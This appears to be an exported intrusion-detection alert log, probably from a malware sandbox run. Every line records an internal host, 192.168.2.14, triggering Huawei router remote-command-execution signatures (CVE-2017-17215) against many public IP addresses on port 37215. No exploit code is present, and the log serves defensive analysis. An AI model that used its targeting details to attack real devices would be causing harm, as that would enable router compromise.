                                                    07/10/24-08:27:22.564607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3479237215192.168.2.14197.51.56.113
                                                    07/10/24-08:26:42.345692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5915837215192.168.2.14197.139.47.110
                                                    07/10/24-08:26:18.029316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4238637215192.168.2.1441.239.89.202
                                                    07/10/24-08:26:38.559907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3370837215192.168.2.14197.131.57.98
                                                    07/10/24-08:26:57.682663TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3471837215192.168.2.1478.126.131.207
                                                    07/10/24-08:27:19.316090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5425837215192.168.2.14197.225.126.147
                                                    07/10/24-08:27:19.336820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3753837215192.168.2.14157.131.226.12
                                                    07/10/24-08:27:02.696239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4261837215192.168.2.14121.179.198.130
                                                    07/10/24-08:26:13.714672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4813237215192.168.2.14197.152.159.76
                                                    07/10/24-08:27:13.965572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5319237215192.168.2.1441.196.125.190
                                                    07/10/24-08:26:59.529956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5063237215192.168.2.1491.106.137.5
                                                    07/10/24-08:27:22.563046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4128637215192.168.2.14157.121.57.61
                                                    07/10/24-08:26:55.308630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5104437215192.168.2.14157.180.231.133
                                                    07/10/24-08:26:34.191107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6019037215192.168.2.1441.236.108.130
                                                    07/10/24-08:26:23.279248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5021437215192.168.2.14157.159.73.121
                                                    07/10/24-08:26:15.869789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3838837215192.168.2.14197.29.85.96
                                                    07/10/24-08:26:28.880092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3664437215192.168.2.14157.84.197.168
                                                    07/10/24-08:26:36.418170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4716637215192.168.2.1441.71.151.211
                                                    07/10/24-08:27:10.586352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5982437215192.168.2.14197.239.133.147
                                                    07/10/24-08:27:23.942038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4642437215192.168.2.14166.217.208.167
                                                    07/10/24-08:26:47.860875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4629437215192.168.2.14197.2.167.163
                                                    07/10/24-08:26:15.791528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4079237215192.168.2.14197.8.157.134
                                                    07/10/24-08:26:41.628503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3998637215192.168.2.1441.134.157.125
                                                    07/10/24-08:27:17.014699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4835037215192.168.2.1441.156.112.12
                                                    07/10/24-08:26:11.538305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5142237215192.168.2.1441.170.150.68
                                                    07/10/24-08:27:31.441274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4618437215192.168.2.1441.245.254.200
                                                    07/10/24-08:26:20.159669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5623637215192.168.2.14101.247.125.246
                                                    07/10/24-08:26:33.227132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5333437215192.168.2.14157.65.159.237
                                                    07/10/24-08:26:33.231077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5753837215192.168.2.1441.16.133.113
                                                    07/10/24-08:27:05.064753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513437215192.168.2.14197.16.53.221
                                                    07/10/24-08:26:20.170023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5274837215192.168.2.14157.113.39.238
                                                    07/10/24-08:26:23.350610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3993837215192.168.2.14157.176.136.90
                                                    07/10/24-08:27:10.660823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5318037215192.168.2.14217.178.192.130
                                                    07/10/24-08:26:26.583934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4663037215192.168.2.1441.177.40.250
                                                    07/10/24-08:26:33.165802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3769837215192.168.2.1437.186.224.51
                                                    07/10/24-08:27:33.762956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4335237215192.168.2.14151.225.248.10
                                                    07/10/24-08:27:10.664334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5659437215192.168.2.1441.165.83.114
                                                    07/10/24-08:27:11.533118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4707437215192.168.2.1441.40.246.181
                                                    07/10/24-08:26:13.787067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5253037215192.168.2.14197.161.19.40
                                                    07/10/24-08:27:13.968872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4874637215192.168.2.1441.219.83.160
                                                    07/10/24-08:26:25.499422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4308637215192.168.2.1441.113.121.243
                                                    07/10/24-08:27:22.479791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5499837215192.168.2.1463.150.113.83
                                                    07/10/24-08:27:22.818188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5638637215192.168.2.14197.5.207.107
                                                    07/10/24-08:27:20.476661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4290837215192.168.2.1441.37.205.41
                                                    07/10/24-08:27:33.755153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5454437215192.168.2.14197.104.88.153
                                                    07/10/24-08:26:42.164122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4495837215192.168.2.1441.212.236.101
                                                    07/10/24-08:27:02.968526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4825037215192.168.2.14197.73.58.83
                                                    07/10/24-08:27:03.000855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5157237215192.168.2.14197.102.230.72
                                                    07/10/24-08:26:33.249834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5323037215192.168.2.1441.6.84.175
                                                    07/10/24-08:26:43.923272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3656637215192.168.2.14157.101.46.130
                                                    07/10/24-08:26:17.974548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5554437215192.168.2.1441.217.1.150
                                                    07/10/24-08:26:57.596695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5638637215192.168.2.14197.78.64.142
                                                    07/10/24-08:26:43.865375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4266637215192.168.2.14197.204.226.106
                                                    07/10/24-08:26:47.837566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3564037215192.168.2.14197.205.116.166
                                                    07/10/24-08:26:43.649777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4917437215192.168.2.14109.80.189.203
                                                    07/10/24-08:27:11.479148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5821437215192.168.2.14157.137.55.69
                                                    07/10/24-08:26:13.837013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5430237215192.168.2.1441.69.222.164
                                                    07/10/24-08:26:23.318563TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4653437215192.168.2.14157.27.4.10
                                                    07/10/24-08:26:28.638597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4385237215192.168.2.14157.22.52.89
                                                    07/10/24-08:26:59.596848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4650437215192.168.2.1441.177.171.253
                                                    07/10/24-08:27:33.729684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4284437215192.168.2.14197.216.185.195
                                                    07/10/24-08:26:26.593421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4681037215192.168.2.14157.150.226.23
                                                    07/10/24-08:26:59.538381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5976037215192.168.2.1441.202.42.127
                                                    07/10/24-08:26:25.423394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4424037215192.168.2.14165.209.123.17
                                                    07/10/24-08:26:55.366131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5351637215192.168.2.1443.30.4.234
                                                    07/10/24-08:26:33.251100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5296437215192.168.2.14157.61.129.124
                                                    07/10/24-08:26:43.799492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4140037215192.168.2.14157.215.173.133
                                                    07/10/24-08:27:27.151855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4390237215192.168.2.1441.152.201.71
                                                    07/10/24-08:26:45.598078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3543237215192.168.2.14183.67.122.30
                                                    07/10/24-08:26:38.608013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4188237215192.168.2.14157.118.74.94
                                                    07/10/24-08:27:10.629936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5516437215192.168.2.14157.25.105.185
                                                    07/10/24-08:26:43.645896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5724237215192.168.2.1441.18.233.143
                                                    07/10/24-08:27:27.041240TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4025037215192.168.2.1479.9.85.92
                                                    07/10/24-08:26:29.797142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5182837215192.168.2.1441.253.90.182
                                                    07/10/24-08:26:29.812412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4596637215192.168.2.1490.155.199.38
                                                    07/10/24-08:26:57.642327TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4941037215192.168.2.1441.98.148.212
                                                    07/10/24-08:27:22.919171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4277037215192.168.2.1441.158.56.218
                                                    07/10/24-08:26:48.000365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4989837215192.168.2.14197.243.55.56
                                                    07/10/24-08:26:59.797297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4827837215192.168.2.1474.96.252.174
                                                    07/10/24-08:26:59.666113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6056237215192.168.2.1492.165.118.199
                                                    07/10/24-08:26:59.844972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5767637215192.168.2.14197.55.218.143
                                                    07/10/24-08:27:08.412825TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5628237215192.168.2.14157.89.211.128
                                                    07/10/24-08:26:47.851714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5511237215192.168.2.14197.54.119.138
                                                    07/10/24-08:27:19.343143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3853437215192.168.2.14197.251.219.48
                                                    07/10/24-08:26:45.652788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4636437215192.168.2.14197.118.218.237
                                                    07/10/24-08:26:13.835894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5733237215192.168.2.14190.23.119.116
                                                    07/10/24-08:26:23.322127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3418237215192.168.2.1441.105.59.34
                                                    07/10/24-08:26:38.549884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3729637215192.168.2.14197.61.61.6
                                                    07/10/24-08:26:51.966611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4825637215192.168.2.1475.91.177.209
                                                    07/10/24-08:26:51.994120TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3776637215192.168.2.14197.244.66.4
                                                    07/10/24-08:26:49.772453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3404237215192.168.2.1441.48.128.5
                                                    07/10/24-08:26:13.833831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3964437215192.168.2.1488.223.157.166
                                                    07/10/24-08:26:25.449676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4579237215192.168.2.14197.40.14.135
                                                    07/10/24-08:26:26.500109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3424237215192.168.2.14179.84.134.151
                                                    07/10/24-08:27:27.063010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5449837215192.168.2.14157.182.240.118
                                                    07/10/24-08:26:17.981356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5983837215192.168.2.1441.218.105.156
                                                    07/10/24-08:26:29.864759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3352837215192.168.2.14157.164.36.92
                                                    07/10/24-08:26:57.593724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3442637215192.168.2.14197.235.177.84
                                                    07/10/24-08:27:05.127145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5572437215192.168.2.1495.93.12.251
                                                    07/10/24-08:27:22.460068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3644437215192.168.2.14157.160.190.39
                                                    07/10/24-08:27:27.122406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5707437215192.168.2.14164.144.5.178
                                                    07/10/24-08:26:33.262601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4883437215192.168.2.14207.235.117.115
                                                    07/10/24-08:26:47.746309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4019837215192.168.2.14157.36.66.164
                                                    07/10/24-08:27:31.526577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5879237215192.168.2.1441.157.23.22
                                                    07/10/24-08:26:28.728877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5141437215192.168.2.1441.35.55.197
                                                    07/10/24-08:26:31.086358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4283237215192.168.2.14157.230.159.3
                                                    07/10/24-08:26:34.196325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4257837215192.168.2.14197.98.123.55
                                                    07/10/24-08:26:41.418046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5738037215192.168.2.14157.106.78.71
                                                    07/10/24-08:26:52.066193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4912837215192.168.2.1441.68.134.25
                                                    07/10/24-08:27:07.263619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4093037215192.168.2.14157.82.17.22
                                                    07/10/24-08:27:11.516345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4788637215192.168.2.14197.54.164.219
                                                    07/10/24-08:27:08.392064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5774437215192.168.2.14197.97.157.97
                                                    07/10/24-08:26:51.979400TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4577237215192.168.2.14197.182.96.41
                                                    07/10/24-08:26:59.765142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4810837215192.168.2.14177.139.207.103
                                                    07/10/24-08:27:22.939147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4766037215192.168.2.14157.78.51.19
                                                    07/10/24-08:26:58.519894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4351237215192.168.2.14208.227.217.40
                                                    07/10/24-08:27:27.155928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4159037215192.168.2.14157.89.144.91
                                                    07/10/24-08:27:11.476399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5956037215192.168.2.1476.8.187.115
                                                    07/10/24-08:26:31.061438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5935437215192.168.2.1441.219.104.33
                                                    07/10/24-08:26:34.269822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6042437215192.168.2.14134.31.242.146
                                                    07/10/24-08:26:49.772453TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5856837215192.168.2.1441.164.233.213
                                                    07/10/24-08:26:52.024313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3362237215192.168.2.14207.221.212.17
                                                    07/10/24-08:26:11.567410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3860637215192.168.2.14157.155.92.145
                                                    07/10/24-08:26:11.128878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4536037215192.168.2.14197.225.238.55
                                                    07/10/24-08:26:33.245914TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5382037215192.168.2.1441.196.51.82
                                                    07/10/24-08:27:05.206516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5218037215192.168.2.14217.52.185.108
                                                    07/10/24-08:27:33.941322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5467037215192.168.2.1441.207.248.40
                                                    07/10/24-08:26:11.659473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3727037215192.168.2.14157.13.78.138
                                                    07/10/24-08:26:41.508048TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4089637215192.168.2.1441.97.8.233
                                                    07/10/24-08:26:52.033038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3891837215192.168.2.1475.199.162.35
                                                    07/10/24-08:26:11.533087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4377437215192.168.2.1432.36.66.249
                                                    07/10/24-08:26:59.776063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5439037215192.168.2.14157.230.112.138
                                                    07/10/24-08:27:19.339417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4309637215192.168.2.14197.128.221.185
                                                    07/10/24-08:26:14.763197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5116237215192.168.2.14157.138.129.0
                                                    07/10/24-08:26:59.646410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5497237215192.168.2.14197.207.108.170
                                                    07/10/24-08:27:32.587332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5554237215192.168.2.14197.28.44.192
                                                    07/10/24-08:26:28.824956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4088637215192.168.2.14179.71.144.235
                                                    07/10/24-08:26:13.741925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3543237215192.168.2.14157.76.20.6
                                                    07/10/24-08:27:10.636807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4139237215192.168.2.14157.31.99.116
                                                    07/10/24-08:26:59.639186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5740837215192.168.2.1441.101.42.93
                                                    07/10/24-08:27:08.455887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5940037215192.168.2.14157.18.211.26
                                                    07/10/24-08:26:42.359553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3625437215192.168.2.1441.70.116.102
                                                    07/10/24-08:26:14.814153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5628237215192.168.2.1441.201.57.162
                                                    07/10/24-08:26:41.578531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4027237215192.168.2.14157.189.123.133
                                                    07/10/24-08:26:47.749012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4988637215192.168.2.14157.13.186.162
                                                    07/10/24-08:27:23.452279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5824437215192.168.2.1441.108.74.205
                                                    07/10/24-08:26:28.840131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3885837215192.168.2.1441.207.185.82
                                                    07/10/24-08:27:19.163791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4147237215192.168.2.1469.222.250.129
                                                    07/10/24-08:26:53.135009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3572237215192.168.2.14177.51.179.21
                                                    07/10/24-08:26:17.994829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3532637215192.168.2.14157.168.187.255
                                                    07/10/24-08:26:49.904329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3499037215192.168.2.1463.67.86.83
                                                    07/10/24-08:27:05.164451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4932637215192.168.2.1470.37.124.87
                                                    07/10/24-08:26:59.617070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4021437215192.168.2.14157.250.105.241
                                                    07/10/24-08:26:43.610236TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4051037215192.168.2.1441.189.89.164
                                                    07/10/24-08:26:45.598078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4824037215192.168.2.14197.237.178.102
                                                    07/10/24-08:27:05.194226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3679237215192.168.2.14148.111.39.182
                                                    07/10/24-08:26:29.883376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5923637215192.168.2.1441.176.173.241
                                                    07/10/24-08:26:43.919816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5500237215192.168.2.14168.100.97.42
                                                    07/10/24-08:26:36.427359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5443437215192.168.2.1441.143.218.57
                                                    07/10/24-08:27:33.874571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5879837215192.168.2.1441.251.112.76
                                                    07/10/24-08:26:41.362168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5441637215192.168.2.1441.191.175.59
                                                    07/10/24-08:26:28.899936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4716237215192.168.2.1446.122.8.79
                                                    07/10/24-08:26:42.356515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4221837215192.168.2.14197.170.133.42
                                                    07/10/24-08:27:07.281764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4721037215192.168.2.1454.47.75.175
                                                    07/10/24-08:26:44.567411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5112437215192.168.2.14161.200.193.17
                                                    07/10/24-08:27:28.114427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5074437215192.168.2.14165.201.190.181
                                                    07/10/24-08:26:31.099427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3573637215192.168.2.14197.58.128.32
                                                    07/10/24-08:27:33.980422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5938837215192.168.2.14197.210.194.52
                                                    07/10/24-08:26:36.382964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5918437215192.168.2.14157.65.178.11
                                                    07/10/24-08:27:05.189458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4235437215192.168.2.14197.138.243.134
                                                    07/10/24-08:27:02.759865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4103037215192.168.2.14118.14.101.102
                                                    07/10/24-08:27:10.767328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4466237215192.168.2.1441.54.219.75
                                                    07/10/24-08:26:11.567410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4457237215192.168.2.1441.89.167.115
                                                    07/10/24-08:26:34.242902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5748637215192.168.2.14197.125.159.173
                                                    07/10/24-08:27:08.405574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4417437215192.168.2.14197.198.184.81
                                                    07/10/24-08:27:02.776043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3511437215192.168.2.14197.80.218.205
                                                    07/10/24-08:27:27.051851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5653837215192.168.2.14220.120.215.167
                                                    07/10/24-08:26:59.657452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5575637215192.168.2.14201.222.63.238
                                                    07/10/24-08:27:24.959708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5972437215192.168.2.14197.245.199.40
                                                    07/10/24-08:26:13.820955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4557037215192.168.2.1441.237.79.168
                                                    07/10/24-08:26:14.819807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5098837215192.168.2.14157.203.24.33
                                                    07/10/24-08:26:36.407750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5435237215192.168.2.14157.33.239.230
                                                    07/10/24-08:26:28.879483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5020837215192.168.2.14157.155.80.153
                                                    07/10/24-08:27:14.850693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4881837215192.168.2.14197.67.37.200
                                                    07/10/24-08:27:33.752992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5290437215192.168.2.14197.128.163.31
                                                    07/10/24-08:26:45.653833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5393437215192.168.2.14197.130.123.220
